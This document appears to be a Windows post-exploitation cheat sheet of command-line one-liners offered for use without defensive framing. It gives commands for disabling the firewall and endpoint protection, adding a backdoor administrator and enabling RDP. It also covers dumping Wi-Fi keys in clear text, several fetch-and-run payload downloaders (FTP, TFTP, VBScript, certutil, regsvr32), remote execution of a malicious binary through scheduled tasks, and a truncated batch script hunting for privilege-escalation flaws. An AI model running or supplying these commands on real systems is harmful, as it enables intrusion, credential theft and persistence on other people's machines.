


netsh advfirewall show state
netsh advfirewall show config
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="Exploit" dir=in action=allow program="C:\exploit.exe" enable=yes
netsh firewall add portopening tcp 2482 lt enable all


schtasks /query /fo LIST /v
tasklist /SVC
sc qc Spooler

Enable RDP

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Add Admin User

net user [username] [password] /add
net localgroup administrators [username] /add

( C:\WINNT\System32>net user GOD 0wned /add )
( C:\WINNT\System32>net localgroup administrators GOD /add )

Dump Wi-Fi passwords to .xml (exports each saved profile with its key in clear text)

netsh wlan export profile key=clear

Dump Wi-Fi SSID/password one-liner

@echo off & for /f "tokens=1*delims=:" %a in ('netsh wlan show profiles') do (for /f "tokens=*" %c in ("%~b") do netsh wlan show profile name=%c key=clear) | findstr   /c:"Key Content" /c:"SSID name"

OS Name and Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Transfer File from FTP

echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp

Transfer File from TFTP

tftp -i get yourfile.exe && start yourfile.exe

Transfer a file via ADODB.Stream (VBScript downloader)

echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs

Re-enable ADODB.Stream if patched (removes its ActiveX Compatibility Flags value)

echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg

Web download using CertUtil

certutil -urlcache -split -f && start yourfile.exe

Mount Windows Share with Null Session

net use x: \\server\share "" /u:

Disable Symantec Endpoint Protection

c:\program files\symantec\symantec endpoint protection\smc -stop

Remote command execution via AT

at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"


schtasks /create /tn rb /tr "c:\EVIL.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""

Run an external Windows Script Component via regsvr32 (pops calc.exe)

regsvr32 /s /n /u /i: scrobj.dll

Run Sysinternals programs from a network share

pushd \\ && autoruns /accepteula && pause && popd

Find unquoted service binary paths without access to wmic. Run both commands: the first handles single-word service names, the second (tokens=2*) catches services whose names contain spaces:

for /f "tokens=2" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc %i | findstr "BINARY_PATH_NAME" >> output.txt
for /f "tokens=2*" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc "%i %j" | findstr "BINARY_PATH_NAME" >> output.txt


Check permissions on services

@echo off
REM Batch port of selected modules from PowerUp by harmj0y
REM Author: @_wald0

REM ======================================
REM = Find unquoted service binary paths =
REM ======================================
echo Finding unquoted service binary paths...

for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
    set str=%%i
	set str=!str:~1!
    sc qc "!str!" | findstr "BINARY_PATH_NAME" | findstr /iv "c:\windows\\" | findstr /iv """

REM ========================================================================
REM =                 Check permissions on services                        =
REM =           Technique stolen from PowerUp by harmj0y                   =
REM = =
REM ========================================================================
echo Finding service binaries your user has write access to...

for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
    set str=%%i
	set str=!str:~1!
	for /f "tokens=4" %%e in ('sc qc "!str!" ^| findstr "ERROR_CONTROL"') do (
	    set errCtrl=%%e
		sc config "!str!" error= !errCtrl! > nul && (
		        echo Vulnerable service found: !str!

REM =================================================
REM = Check for write access to directories in PATH =
REM =================================================
echo Finding write access in PATH directories...

for %%A in ("%path:;=";"%") do (
    set filename=%%~A\dll-write-check.txt
	copy /y nul "!filename!" > nul 2>&1 && (
	    del "!filename!"
	    echo Writable path directory found: %%A